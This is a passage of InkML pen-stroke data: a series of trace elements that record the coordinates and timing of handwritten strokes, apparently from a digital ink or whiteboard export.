  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210504.4121">5708 4021 50 0,'0'0'132'0,"0"0"-1"0,0 0-5 15,0 0-16-15,0 0-6 0,0 0-15 0,0 0-11 16,0 0-9-16,0 0-10 0,0 0-5 0,0 0-6 16,0 13-9-16,0-5 1 0,0 2-5 0,0 8 3 15,-4 7-11-15,3 1-2 0,-3 3 4 0,0 4-3 16,-4-2 0-16,2-1 10 0,1 5-17 0,-4-4-2 16,5 3-3-16,-6-3-11 0,2 1-6 0,5-5-8 15,-3-2-15-15,4-6-18 0,-1-1-17 0,2-7 0 16,0 0-3-16,-2-2-4 0,3-2 6 0,0-3 12 15,-2 1-2-15,2-2 0 0,0-3-9 16,0 0-19-16,0 0-42 0,0 0-132 0,0-19 59 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210814.5096">5795 3914 71 0,'6'-3'75'0,"1"2"0"0,0 0-13 0,1 0 1 16,0 1-7-16,3 0-5 0,-2 2-4 16,1 1-8-16,-2 1-2 0,3 0-5 0,-2 2 0 0,1 1-2 15,-3 0-5-15,1 1 1 0,-2-1-1 0,-1 2-5 16,-1 0-3-16,1 0 4 0,-5 3 10 0,0-3-7 15,-2 1 0-15,-1 0-5 0,-2 0 5 0,0 2-2 16,-5 1 0-16,-4 1 1 0,2-2-8 0,-2 1 2 16,-1 0 2-16,-1-1-6 0,4-2-2 0,1-3 1 15,0-1-3-15,2-2-5 0,2 2-22 0,0-3-16 16,-2 2-5-16,4-4-18 0,0 0-24 0,-2-1-63 16,7 0-156-16,-10 0 69 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="211044.6872">5979 3970 5 0,'4'5'66'0,"-4"-1"-1"16,1 0 1-16,3 2-15 0,-3 2-6 0,3 2 3 15,0 1 3-15,1 6-6 0,-3 1-3 0,0 3-6 16,-1-2 1-16,2 0-5 0,-1 7-8 16,-1-7 2-16,2 1-11 0,0-2 1 0,0 1-6 15,1-2-35-15,-1-2-14 0,-1-4-13 0,2-1-42 16,-1 1-103-16,-1-4 46 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="211252.764">6270 4049 106 0,'-27'17'118'0,"-5"2"1"15,-15 13-12-15,-6-2-6 0,1 4-10 0,-4-3 7 16,1-2-27-16,-1 3 2 0,0-3-13 0,2 6 0 0,-19 15-12 15,22-14-24-15,-20 19-53 16,-1 5-75-16,4-1-54 0,-3-3-170 0,22-21 76 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="266615.1962">7766 9185 11 0,'29'-38'39'0,"-5"10"1"0,0 2-7 16,-2 4-4-16,1 3-4 0,-1 2 3 0,-4 5-8 15,0 1-4-15,-2 2-2 0,1 3 2 0,-1 2-3 16,-1 2 1-16,4 1-6 0,-1 4 4 0,0 3-4 16,-2 4-10-16,3 0-7 0,-2 3 3 0,-3 3 1 0,-1 7-3 15,-8-4 1-15,0 8-3 0,-6 2 3 0,-4-1 1 16,-7 4-2-16,-2-2 1 0,-9 14-16 15,-4-2-15-15,-1 1-42 0,-10 4 19 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="305680.7268">5993 5750 13 0,'0'0'90'0,"0"0"-3"0,-4-4-17 16,4 4 5-16,-5-3-12 0,5 3-5 0,0 0-5 15,0 0-5-15,-5-2-6 0,5 2-5 0,0 0-6 16,0 0-3-16,-5-1 6 0,5 1-16 0,0 0 0 16,0 0 1-16,0 0-6 0,0 0 1 0,-8 5 2 15,3-3-9-15,1 1 2 0,-1 1-4 0,1 1 2 16,-1 0 2-16,-3 4 19 0,1-3-24 0,-1 4-9 16,-1-2 11-16,-1 4-1 0,2-3-7 15,1 1 8-15,-5 3-1 0,1-1-16 0,0 4 9 0,1-2-1 16,-1 0 11-16,-1-1-3 0,3 2 0 0,-1-1-6 15,2-2 8-15,1 3-9 0,-1-2 2 0,2 0 3 16,1 2-3-16,1-4 6 0,1 2-5 0,-1-2 4 16,-1 3-11-16,5-3 9 0,-3-1-1 0,1 4 2 15,2-6-4-15,2 3 0 0,-2-3 4 0,3 3-4 16,0-4-1-16,-1-1-4 0,2 3 8 0,-1 1 4 16,1-1-11-16,-2-2 1 0,2-1 0 0,1-1 4 15,0 0 2-15,3 1-3 0,-3-3 0 0,1 1 0 16,1-1-5-16,0 1 7 0,2 0-1 0,-2-2-5 15,0 0 17-15,2 1-14 0,0 0 6 0,2-3-4 16,1 1 6-16,-3-2 0 0,4-1-12 0,0-2 2 16,2 1 12-16,-2-1-2 0,-3 0 3 0,4 0 5 15,-5 1-1-15,0-3 4 0,-1 2 4 0,-2 0 20 16,0 1 12-16,0 0 5 0,-1-1 3 0,-1-1-11 16,-2-2-1-16,1 1-5 0,-1-2-4 0,-2 0-11 15,0-3 0-15,0 2-4 0,-2-2 5 0,0 2 8 16,1-1-7-16,-3 0-3 0,2 0-5 0,-5-1-5 15,2 3-3-15,0-2-1 0,-2 2 1 0,0 1 0 16,3-1-5-16,-2 3 2 0,2 0-1 0,-5-3-4 16,4 3 2-16,0 2-3 0,-3 1-1 0,4-2-2 15,-1-1-8-15,0 4-10 0,5 1-35 0,-8-2-14 16,8 2-40-16,-12 9-24 0,2-1-121 0,-1 7-269 0,-3 7 118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19T13:52:46.9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4031 4661 26 0,'1'-4'39'0,"-1"4"-6"15,0-5-2-15,0 5 0 0,0 0-1 0,0-6-7 16,0 2 3-16,0 4-6 0,-1-4-1 0,1 4 3 16,0-5 1-16,0 0-6 0,0 5 0 0,0 0-6 15,-1-5 0-15,1 5 5 0,1-5-3 0,-1 5 1 16,0 0 1-16,-1-5-8 0,1 5 4 0,0 0-2 16,0 0-3-16,0-6 3 0,0 6-3 0,0 0 4 15,0 0-3-15,0-4 0 0,0 4-1 0,0 0-1 16,0 0 7-16,0 0-10 0,1-4 0 0,-1 4-6 15,0 0 9-15,0 0-7 0,0 0 0 0,0 0-2 16,0 0-3-16,7-1 6 0,-7 1-2 0,0 0-3 16,10 1 2-16,-3-1 4 0,4 2-2 0,0-2 2 15,1 0 4-15,1-2-2 0,-2 2-5 0,3 0 0 16,0 0 3-16,5 2-6 0,-1-2 4 0,0 1 9 16,1 0 0-16,2 2-7 0,-1-2-7 0,2 0 10 15,-2 0-3-15,2 0 4 0,0 2-1 0,5 0 2 16,-7-1-7-16,3-1 4 0,-1 3-1 0,-3-3 1 15,4 2-1-15,-1-2 4 0,-5 2-2 0,7 0-1 16,-4 2 1-16,-1-1-5 0,3 2 5 0,-3-4-6 16,3 3 5-16,-4-1-2 0,2 2 7 0,-1-2-4 15,1 0 0-15,-1 4 1 0,0-5 0 0,0 1-3 16,1 3 0-16,1-2-4 0,-1-1 3 0,1 1 0 16,-2-1 3-16,4 0 2 0,0-1-5 0,-2 1-2 15,0 0 4-15,1 0 3 0,2-2-2 0,-6 2-2 16,5-2 1-16,-1 2 3 0,0-2-1 0,4 2-9 15,-3-2 5-15,5 2 0 0,1-2 0 0,1-1 8 16,-2 0-5-16,3 1 2 0,1-4-4 0,0 2 3 16,0 0-4-16,1 0 7 0,2 0-13 0,-1-2 5 15,1 3 4-15,-2-4 14 0,0 5-12 0,2-2-4 16,-1 0 0-16,-2 1-2 0,0 0 10 0,0 2-4 16,1-1-5-16,-2 0-1 0,1 0 5 0,-3 1 4 15,1-3-12-15,3 2 3 0,0 0-2 0,3-1 3 16,-3 2-2-16,3-2 4 0,2 2 8 0,-2 0-8 15,1 1-5-15,1-1 11 0,1-3 0 0,13 3-5 16,-12 0-3-16,1-3 1 0,9 1 1 0,-11-1-1 16,12 0 12-16,-15 1-9 0,6-1 4 0,9-1 0 15,-11 0-2-15,0 2-4 0,-2-1 4 0,-1 1-2 16,-1-1-7-16,-1 0 4 0,-3 2 4 0,0-2 1 16,0 0-2-16,-2 0 7 0,-10 0-9 0,1 0 2 15,-2-2 4-15,-2 2-6 0,-4 0 3 0,0 0-3 16,0-1 2-16,-3 0 0 0,1 1-1 0,-4 0-21 15,-1 0-33-15,0 0-69 0,-6 0-129 0,0 0 57 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5001.7649">1730 4795 38 0,'-13'-4'38'0,"-1"1"0"0,3 0-9 0,1 3 5 16,4-3-3-16,0 2-8 0,-1-1-5 0,7 2-1 15,-9 0-8-15,9 0 3 0,0 0-7 0,-10 0-1 16,9 4 1-16,-2 0 2 0,1 1-2 0,-2 1 2 16,1 3-5-16,1 2 3 0,-2 2-1 0,-4 3-5 15,3 1 4-15,-3 7 1 0,6-5-2 0,-6 5 0 16,2 1 1-16,-2 1-3 0,3-7 1 0,2 0-3 15,-1 7 6-15,3-8-2 0,-4 7 0 16,1 0-3-16,3 1 0 0,1 0 2 0,0-3-3 0,0-2 3 16,5 5-2-16,0-1 5 0,-1-6-3 0,0 8 4 15,1-1-3-15,3-7-2 0,-2 6 3 0,4-1-3 16,3-1 3-16,0-6-3 0,4 6 7 0,-2-1-1 16,2-1-8-16,-1-3 1 0,3 4-1 0,0-2 5 15,3-3-1-15,1 1-2 0,0 1-3 0,4-3 5 16,-1 0 4-16,2 0-6 0,1-2 5 0,-1 0 2 15,4-2-1-15,-4-2-6 0,3 2 5 16,-3-5 2-16,0 2-4 0,1-2 1 0,0-1 0 0,-2-1 1 16,3-3-1-16,-2 0 4 0,3-2-4 0,1 2 0 15,-3-4 1-15,2 0 0 0,0-4 5 0,-1 2-5 16,-2-1-1-16,3-1 5 0,0-2-3 0,-3 1 1 16,0-5-7-16,0 2 5 0,0 0-1 0,4-7 1 15,-4-2 3-15,-2 1 3 0,-3 0-1 16,2-1 3-16,-2-3-6 0,-1-3 3 0,-3-2 1 15,2 1-2-15,-1-5-3 0,-7 1 4 0,0-2-8 0,1 2 3 16,-9-2 2-16,0 0 5 0,-5 0-1 0,-1-1-3 16,-3 0 1-16,-4 1-8 0,-2-2 6 0,-3 4 2 15,-1-1 2-15,-6 3-3 0,-1 0-1 0,1-2-2 16,-5 2 1-16,0-1-4 0,2 4 4 0,-1 2-2 16,-1 1 9-16,2 2-13 0,-1 2 2 0,1 1-2 15,0 6-5-15,4-1 2 0,0 3 2 0,1 1-7 16,-4 2-14-16,-1 1-2 0,-4 1-7 0,8 2 7 15,-8 1-21-15,-2 4-52 0,2 0-106 0,0 2 47 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8200.7834">6743 5463 33 0,'0'0'38'15,"0"0"0"-15,0 0-9 0,0 0-7 0,0 0-3 16,0 0 0-16,0 0-6 0,0 0-1 0,0 0-2 16,0 0 4-16,0 0 0 0,0 0-5 0,5 10-7 15,-5-10 3-15,0 0-2 0,4 3 5 0,-3-2-7 16,-1-1 13-16,4 6-2 0,0-3-1 0,1 0 2 16,0 3-3-16,-1-1 6 0,1 0-7 0,-1-2 8 15,5 3-1-15,0 0-1 0,0-1-3 0,-4 1 5 16,3-3-3-16,-1 5 0 0,4-2 5 0,-2-1 0 15,1 3-4-15,0 0 4 0,0-3-2 0,3 3 11 16,-2-2-5-16,1-1 0 0,-1 1-9 0,1 2 4 16,5-2-2-16,-2 2-1 0,0-2 0 0,-4-2 5 0,2 2-6 15,-1 0-4-15,2-3 0 0,3 4 1 16,-2-1 2-16,3-2 2 0,-3 1-1 0,3-2-4 16,0 0 4-16,0 1 2 0,2-2-1 0,2-2 1 15,-4 2 9-15,2-2 6 0,2 0-11 0,-4 0-5 0,-4-2 5 16,-2 2-1-16,-1-1-15 0,2 0 21 15,-3 0-7-15,-1 1-4 0,3-3 6 0,-2 0 0 16,-4 1 0-16,3 1-5 0,-1-3 13 0,-2 3-1 16,-2-1 3-16,0 0 7 0,1 0 4 0,0-2 0 15,-5 4 4-15,5-3-11 0,-4-2-3 0,2 2-4 0,-2-1-1 16,2 0-11-16,-3 4-33 0,-4-9-38 16,1 5-54-16,0 1-117 0,-7-2-247 0,-1 2 110 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44910.4264">4479 5618 81 0,'0'0'79'0,"-3"-5"-5"16,3 5 1-16,0-4-15 0,0 4-5 0,0 0 1 15,-3-3-10-15,3 3-1 0,-1-4-1 0,1 4-1 16,0 0 7-16,-1-6-7 0,1 6 1 0,-1-4-10 16,1 4-15-16,0 0 9 0,0 0 8 0,0 0-11 15,-3-3-6-15,3 3-1 0,0 0 1 0,0 0-7 16,0 0 8-16,0 0-15 0,0 0 6 0,0 0-1 16,0 0-5-16,0 0 7 0,0 0-2 0,0 0-5 15,0 0-7-15,0 0 4 0,0 0 0 0,0 0-4 16,0 0 4-16,0 0-4 0,8-1-2 0,-3-1 9 15,2 2 9-15,1-2-13 0,4 0 3 0,0 2-3 16,1-2-1-16,0 1 3 0,1 0-2 0,0 1-6 16,4 0 13-16,1 2-12 0,-2 0 2 0,2 0 9 15,-2 2-11-15,-1-3 7 0,2 6-11 0,1-4 6 16,0 4 5-16,-2-3-9 0,3 2 8 0,-2 3-2 16,9 0 3-16,0 0 6 0,1 0-4 0,-1-2-1 15,4 0-4-15,-1 0 5 0,2 2 4 0,2-3-14 16,0 2 9-16,3-2 1 0,0 2-5 0,0 0-5 15,-1-1 2-15,1 2 10 0,-4-1-22 0,3 0 18 16,1-1-3-16,-2 3-2 0,-2-2 9 0,0-1-7 16,-1 2-5-16,0-3 3 0,0 3 9 0,0-4-5 15,-1 1-4-15,-1-2 3 0,0 2 7 0,0-1-1 16,0-3 4-16,-2 1-7 0,0 1-4 0,-1-4 6 16,-7 0-12-16,8 0 9 0,-6 1 20 0,-4-2-20 15,1 1 3-15,-5-2 0 0,-1 2 5 0,0-1 5 0,-2 0 9 16,1-2-5-16,-2 3 7 0,-2-3-3 0,-2 3-2 15,-1 0 9-15,0-2-10 0,0 0 5 16,-5 2-4-16,11 0-6 0,-11 0-8 0,3-3-21 16,-3 3-25-16,0 0-44 0,0 0-21 0,4 7-103 15,-6-4-224-15,-7 4 100 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="50890.5675">9464 4783 28 0,'-4'-1'78'0,"4"1"-8"0,-5-3-12 0,0 2 9 15,5 1-7-15,-10-2 6 0,2 1-6 0,8 1-7 16,-13 0-7-16,3 0-10 0,-5 2 0 16,-2 2 0-16,-3 0 0 0,-10 3-8 0,0 2-3 0,-5 1 4 15,-2 2 2-15,-14 6-3 0,-5 4-5 0,-2-1-1 16,-2 1 9-16,0-3-11 0,-1 1-8 0,-1 1 15 15,2-2-7-15,4-2 4 0,1-1-2 0,0 1 8 16,0-1-13-16,2-1 7 0,1-2 1 0,0 3-2 16,1-2-3-16,0-2 9 0,0 3-14 15,-2 0 4-15,16-7 0 0,0 3-3 0,3-4-1 0,7 0-5 16,9-3 8-16,4-1 1 0,2 1-8 0,5-3-3 16,-1 1-3-16,3-1 2 0,-2 0-10 0,2 0-3 15,5-1-5-15,-6 1-11 0,6-1-4 0,-4 3-3 16,4-3 2-16,0 0-14 0,0 0-1 0,0 0 3 15,0 0-14-15,0 0-12 0,0 0 1 0,14-17-11 16,-5 11-10-16,-1-2-51 0,1 1-147 0,3-5 65 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="51203.1001">8237 4879 42 0,'0'0'64'16,"0"-5"-5"-16,0 5-9 0,0 0-7 0,0 0-7 15,0 0-1-15,0 0-4 0,0 0-5 0,-9 9 1 16,4-3 2-16,-3 4-1 0,-4 4 4 0,-1 0-2 16,-4 6 11-16,2 3-8 0,-3-2-3 0,0 3-6 15,0-1 0-15,-1 0 0 0,5 1 0 0,-4-2 0 16,3 2 1-16,0-2 10 0,6-5-5 0,-1 1-12 15,5-1-1-15,-3-2 0 0,4-3-3 0,1-1 3 16,2-1-5-16,0 3-2 0,1-1 1 0,1-1 6 16,1 1-3-16,4-3 10 0,1 2 11 0,2-1-4 15,7 0-2-15,-1-2 2 0,4 0 0 0,9 3-4 16,4-5-4-16,4 2-3 0,2-3-4 0,17 1-27 16,-1 0-45-16,2 2-144 0,-1 0-214 0,-4-5 94 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="66971.2231">7396 5597 21 0,'2'-4'33'0,"-2"4"-1"15,2-4-4-15,-2 4 3 0,0-5-5 0,0 5-1 16,0-6-2-16,1 2-1 0,-1 0-5 0,0-1 4 16,0 0-9-16,-1 1 2 0,1-2-7 0,0 0 1 15,-2 1 3-15,0 0-3 0,0-1-2 0,0-4-3 16,-2 0 6-16,3 1-9 0,-1-1 15 0,-2 0-12 15,-1 1 7-15,2 3-4 0,-1-2-1 0,1-2 2 16,-1 5 1-16,1-2-3 0,-2-3-5 0,2 4-2 16,-3-3 7-16,2-1 2 0,-1 0-5 0,0 1-3 15,-1-2 4-15,-3-1 0 0,4 2-9 0,-3 1 6 16,1-2 3-16,1 2-2 0,-1 0 1 0,-1 2-2 16,0 0-1-16,2 0 5 0,-3-2-1 0,1 0-9 15,0 2 4-15,-1 0-9 0,2 1 12 0,-5-2-4 16,2 0 3-16,0 2 0 0,2-1-2 0,-1 0 4 15,-5 3 4-15,5 0-8 0,-1-2 4 0,-3 2 3 16,4-1-8-16,-2 2-2 0,-1-3 8 0,1 1-2 16,-2 2-1-16,2-1 0 0,-2-1-10 0,-1-1 17 15,-3 2-3-15,3 0-3 0,2 0-1 0,-1 0-3 16,1 2 3-16,2 1-4 0,-3-2 2 0,3 0-2 16,-1 0 6-16,0 1-4 0,-1 0 4 0,1 0-2 0,0 1 2 15,-1 1-4-15,1 0 2 0,-1-1-13 0,3 2 11 16,-2-1-1-16,-1 0 2 0,3 1-4 15,-1 2 5-15,2-2-2 0,-3 1 2 0,3 1 0 16,0-3 2-16,1 4 1 0,0-2-3 0,-2 0-1 16,-1 2-5-16,2 0 3 0,1-1 3 0,1 1 1 0,-1 3 0 15,-1-2-1-15,2 2-9 0,-3 0 11 0,3-1 1 16,-2 4-4-16,2-3-4 0,-1 1 2 0,1 1 2 16,1 0 4-16,1 0-2 0,-1 1-2 0,0 2 2 15,-3-2-5-15,4-1 7 0,-1 1-3 0,4 2 3 16,-6-2-2-16,5 3-3 0,-1-2 0 0,-1 0 3 15,-1-3 1-15,4 4-4 0,0-3 0 0,-3 1 6 16,4 1-2-16,-3-1-3 0,3-1 5 0,0 1-3 16,0 0 1-16,-1-2-4 0,1 3-1 0,0-1 3 15,4 0 5-15,-4 1 0 0,4 0-4 0,-3 1 0 16,4 1 3-16,0-3-3 0,4 6 2 0,-5-5-3 16,5 0-3-16,0 3 5 0,1 1-1 0,2-5 10 15,2 4-6-15,-1-4-2 0,2 0-5 0,-1 2 5 16,4-3-4-16,-2-2-1 0,2 0 0 0,3 0 4 15,-2-2 1-15,1 0 0 0,2-1-1 0,-4-3-2 16,6 2 2-16,3-1 4 0,1 1-5 0,2-3 1 16,0-3 2-16,1 1-3 0,-2-1 0 0,1 0-1 15,-2 0 4-15,-2-5-2 0,2 2 0 0,0-2 2 16,-2-2-4-16,1-1 2 0,0 1-2 0,1-5-10 16,-4 2 9-16,0-1 1 0,-1-1 2 0,-6 2 2 15,3-4 1-15,-3 4-4 0,0 1 0 0,2-5 0 16,-6 1-4-16,1-1 9 0,3-3-6 0,-2 0-3 15,-3 6 4-15,-2-4-2 0,-3 0-1 0,4-5 4 16,-4 5-5-16,0-1 4 0,-3 1 10 0,-3 0-5 16,-1 1-1-16,-3 0 6 0,3-1-5 0,-2 2-2 15,-3-3-2-15,-2 2 3 0,1 0-1 0,-2 0 3 16,0 0-3-16,-2 0 0 0,0 0-7 0,1 2 9 16,-2 0 1-16,2 0-1 0,-4 3-1 0,0-3 0 15,0 4-1-15,-1-5 0 0,0 6 0 0,-2-2 5 16,1 0-4-16,-1 2-5 0,2 0-2 0,-1 0 5 15,-1 1 2-15,0 2-8 0,1-2 6 0,3 2 1 16,-1 4-4-16,0-3 0 0,2 3 4 0,-1 0 1 16,1 0-5-16,-1 1 5 0,3 0-2 0,0 2-8 15,2 0-10-15,0 0 15 0,7 0 1 0,-9 0 1 16,9 0-2-16,-12 0-5 0,5 3-1 0,1 0-3 16,-3 2-4-16,-3 2-8 0,3 3-5 0,-2 1-6 0,-1 4-5 15,1-1-5-15,-1 2-25 0,2-1-72 16,1 2 32-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="77972.0122">3427 6670 43 0,'-4'-3'69'16,"1"-1"3"-16,1 1-6 0,2 3-4 0,-4-6 1 15,1 2-15-15,1 1-4 0,2 3 5 0,-5-5 0 16,1 1 9-16,4 4-16 0,-3-3-15 0,3 3 23 16,-1-4-10-16,1 4-5 0,0 0-7 0,-2-4-8 15,2 4 4-15,0 0-3 0,0 0 1 0,-3-2-11 16,3 2 6-16,0 0-7 0,0 0-3 0,0 0 6 15,0 0-7-15,0 0 3 0,0 0-2 0,0 0-3 16,18 2 9-16,-11-1-8 0,1 0 2 16,4 1-8-16,0 0 4 0,1 0-2 0,5 1-1 0,0-1 4 15,0 1 9-15,-2 0-12 0,1 0-4 0,2-1-2 16,-2 1 6-16,1-1 10 0,-5-1-10 0,4 3-4 16,2-1 1-16,-2 1-1 0,2-2-9 0,1 1 23 15,0-2-11-15,3 4 3 0,-5-3 0 0,13 0 0 16,-11 1-1-16,2-1 1 0,-2 2-5 0,1-3 7 15,0 1-7-15,-1 2-1 0,1-4 2 0,1 3 4 16,-3-3-1-16,3 2 4 0,0-1-6 0,-3 0 6 16,-1-1-9-16,-3 0 4 0,-1 1 0 0,-1-1 0 15,0 0 1-15,-2 0-4 0,2 2 7 0,-3-2-4 16,-1 0 6-16,0 0-16 0,-3 0 2 0,2 0-6 16,1 0-10-16,-1 0-14 0,-1 1-9 0,1-1-8 15,4-1-9-15,-1-1-20 0,1 0-45 0,1-1-137 16,3-4 60-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="78551.8466">4719 6718 16 0,'0'0'6'0,"0"0"-10"16,0 0-4-16,0 0 2 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="79275.0066">4999 6767 10 0,'0'0'69'0,"0"0"-11"16,0 0 0-16,0 0-6 0,0 0-7 0,0 0-8 16,0 0-5-16,0 0 1 0,0 0-8 0,0 0 1 15,0 0-4-15,0 0-1 0,0 0-1 0,7-3-16 16,-7 3 10-16,9 0-1 0,-9 0 0 0,0 0 0 16,14 3-1-16,-6-3-1 0,1 0 3 0,1 4-5 15,-1-1-1-15,4-1-2 0,-3-1 2 0,4 3-2 16,-1-3-1-16,-1 3 1 0,3-1-6 0,-2 1 1 15,4 2 6-15,1 0 0 0,2-1-2 16,1 0-2-16,6 4-7 0,-8-4 8 0,2 0-5 0,8 2 3 16,-1 0-6-16,0-1 6 0,0 1 5 0,0-1-5 15,3-3-2-15,1 1 8 0,-1 0-17 0,-2 2 8 16,1-4 6-16,0 1-4 0,1 0 3 0,1 4-6 16,1-4 7-16,-1 1-16 0,0 1 7 0,1-1 2 15,-2-1 2-15,2-1 4 0,-3 0-8 0,3 1 2 16,-4-3 3-16,-2 3 0 0,2 0-2 0,-8-1 3 15,3 0-6-15,3-2 4 0,-7 2-1 0,1-4 2 16,-2 4-1-16,-1-2 3 0,4-2 0 0,-3 2 3 16,-2-4-5-16,-4 1-1 0,0 2 4 0,0-1-1 15,-1 2 7-15,-1-3-9 0,-3 3 9 0,-2 0-5 16,1-2-3-16,-1 2 10 0,-6 0-5 0,10-1 17 16,-10 1-6-16,0 0 4 0,7 0 8 0,-7 0 4 15,6-3 7-15,-6 3-11 0,0 0 2 0,0 0-6 16,0 0-3-16,0 0 2 0,0 0 9 0,5 3-12 15,-5-3-8-15,0 0-3 0,0 0-2 0,0 0-17 16,0 0-15-16,0 0-22 0,0 0-28 0,0 0-17 16,-17 3-60-16,6-3-161 0,1 0 71 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="86636.0776">3308 4536 17 0,'0'0'103'0,"0"-5"-2"0,0 1-10 16,0 4-1-16,5-7-8 0,-5 6-2 0,0 1 3 15,1-5-3-15,-1 5-2 0,0-7-1 0,4 5-11 0,-4 2-15 16,0 0-3-16,0-4-7 0,0 4 2 0,0 0-12 16,0 0 8-16,0 0-21 0,0 0 4 15,0 0 5-15,0 0 0 0,0 0-9 0,6 13-2 16,-3-9 3-16,-2 1-11 0,6 5 10 0,-6-1-7 0,3 1 3 16,1-2-5-16,1 2-4 0,1-1 2 0,-3 1 0 15,-2 2 6-15,2-2-3 0,1 3-2 0,0-2 1 16,0 1-22-16,0 4-13 15,1-1-6-15,-1-5-8 0,-1 3-21 0,2 2-12 0,-2-4-21 0,1 0-17 16,0-3-59-16,-1 1-184 0,0-4 82 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="87228.1843">3626 4495 2 0,'0'0'95'0,"1"-4"-9"0,-1 4-11 16,0 0-13-16,0 0-7 0,0 0-18 0,7 7 16 16,-6-3-11-16,0 3 7 0,3 3-14 0,-1 2-2 15,1-2-1-15,-3 2 1 0,4 5-11 0,0-5 4 16,-4-1 2-16,2 2-13 0,-1-1 1 15,1-2 2-15,0-1 1 0,-1 0 0 0,1-4-8 0,-2-1-4 16,0 1 3-16,2-1 6 0,-2 0-6 0,0-2-4 16,2 1 5-16,-3-3-5 0,4 2-4 0,-4-2 10 15,0 0 6-15,3 4 0 0,-3-4 2 0,0 0-3 16,7-8 3-16,-1 3-1 0,2-8-3 0,2 4 0 16,-3-2-5-16,0 1 3 0,1 0-4 0,2 0 2 15,-7 2 0-15,6-1-2 0,-4 5-8 0,-4-1 2 16,4 1-2-16,-1 1 0 0,-3-1 4 0,3 2-1 15,-4 2 6-15,7-1-6 0,-7 1-4 16,0 0 1-16,9 7 3 0,-7-3 0 0,3 2-11 0,-2 0 15 16,2 3-22-16,-1 1 18 0,1-1 5 0,-1 1-18 15,-3-1 7-15,4 2 4 0,0-3 2 0,-2 3-6 16,2-4 5-16,-1 2-5 0,-1-5 2 0,1 1-11 16,-1 2 5-16,-1-4 7 0,0 1-10 0,3-1 7 15,-4 1-5-15,2-3 10 0,0 2-2 0,-3-3-10 16,6 5-1-16,-4-3 11 0,-1-1-5 0,2 2 13 15,-3-3-14-15,5 8 8 0,-4-5-2 0,4 2-1 16,-1 1-5-16,-3 0 2 0,3 1 1 0,-1-1-3 16,2 0 8-16,-2-1-5 0,-2 2 1 0,2 1 1 15,0-3-4-15,0 1-2 0,-1-1-1 0,2-1 1 16,0 2-18-16,-1-4 6 0,-1 0 6 0,2 1 0 16,0 0-10-16,-4-3-3 0,0 0-7 0,11-3-9 15,-7 0-10-15,0 1-3 0,1-5-14 0,-1 1-2 16,1-2-56-16,0-2-133 0,0 0 60 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="87536.1354">4153 4553 8 0,'0'17'81'0,"0"2"-5"0,2 7-6 16,-8 2-4-16,2-2-7 0,-2 3-4 0,3-2-1 16,-3 1-7-16,2 1 2 0,1-2-8 0,-3 0-6 15,1 0-4-15,2-7 0 0,1-2-9 0,-1 1 4 16,1-1-7-16,-1-1-1 0,2-2 7 0,-1-3-5 15,4-1-9-15,-4 0-1 0,2-6-6 0,2 4-12 16,-5-4-8-16,3 0-7 0,0-1-3 0,0-4-9 16,0 3-22-16,0-3-59 0,0 0-125 0,0 0 56 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="87787.7641">4246 4570 12 0,'0'0'66'0,"0"0"-4"0,9 2 0 0,-8 0-7 16,0 2-5-16,2-2-7 0,0 3 6 0,-2 1-8 15,0 0-2-15,-1 0-2 0,-1 4-2 0,1 0-9 16,-4 0 6-16,1 1-10 0,-3-2-4 0,-3 4 2 15,3-5 2-15,-2 1-7 0,3-1-1 0,-3 2-2 16,4-5 2-16,0 0-1 0,1 0-15 0,-2-1-12 16,1-3-14-16,0 3-16 0,0-1-69 0,3 0-120 15,-3 0 54-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="88097.949">4493 4735 37 0,'0'0'64'0,"-3"4"-9"0,3-4-6 16,0 0-6-16,0 0-2 0,0 0-7 0,4 6-1 15,0-5 2-15,-2 2-5 0,5-2-6 0,-2 0 3 16,2 0-8-16,1-1-1 0,0 0 2 0,0 0-4 16,0-1 4-16,0 0-4 0,2 0-2 0,-1-2-3 15,-4 0 2-15,0 1-1 0,1-1-2 0,-3-1-1 16,4-2 0-16,-6 1-4 0,4-2 3 0,-5 0 0 16,0 0 1-16,-4 0-11 0,2-3-12 0,-2 3-9 15,-4-2-14-15,-1 0-17 0,-1 0-40 0,1 4-100 16,0-3 44-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="88405.4922">4798 4688 18 0,'3'7'38'0,"-1"-3"-3"0,2-1 2 16,-4-1-11-16,3 1 3 0,-1 0 4 0,-2-3-7 16,0 0 11-16,4 4 3 0,-4-4 11 0,1 2 11 15,-1-2-2-15,0 0-1 0,0 0-11 0,9-9 4 16,-5 3-4-16,1-2-11 0,-1 0-2 0,0 1 4 15,-2-3 3-15,1 3-18 0,1-3 8 0,-3 5-15 16,3-3-14-16,-2 1-11 0,1 0-23 0,-2 2-14 16,-1 0-22-16,4 1-63 0,-4 1-141 0,4 1 64 15</inkml:trace>
